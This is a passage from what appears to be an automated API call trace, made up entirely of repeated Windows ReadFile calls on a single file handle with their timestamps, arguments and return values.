lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.810] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xe, lpOverlapped=0x0) returned 1 [0050.811] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.811] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xa, lpOverlapped=0x0) returned 1 [0050.812] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.812] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xb, lpOverlapped=0x0) returned 1 [0050.812] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.813] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.813] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.813] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xb, lpOverlapped=0x0) returned 1 [0050.814] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.814] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xa, lpOverlapped=0x0) returned 1 [0050.815] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.815] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xe, lpOverlapped=0x0) returned 1 [0050.815] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.816] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.816] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x13, lpOverlapped=0x0) returned 1 [0050.816] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.817] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.817] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.817] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.818] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.818] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.819] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.819] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.819] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.820] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.820] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.820] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.821] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.821] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.821] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.822] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x4, lpOverlapped=0x0) returned 1 [0050.822] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.822] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.823] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.823] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.824] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.824] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.824] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.825] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x13, lpOverlapped=0x0) returned 1 [0050.825] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.825] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.826] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.826] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.826] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.827] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.831] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.831] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.831] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.832] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.832] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.833] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x6, lpOverlapped=0x0) returned 1 [0050.833] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.833] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.834] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.834] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.834] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.835] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.835] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.835] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.836] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.836] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.836] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.837] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.837] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.838] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.838] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.838] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.839] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.839] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.840] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.840] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.840] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.841] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.841] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.841] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.842] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.842] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.842] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.843] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.843] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.843] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.844] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.844] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.845] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.845] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.845] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.846] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.846] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.846] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.847] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.847] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.847] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.848] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.848] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.849] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.849] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.849] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.850] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.850] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.850] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.851] 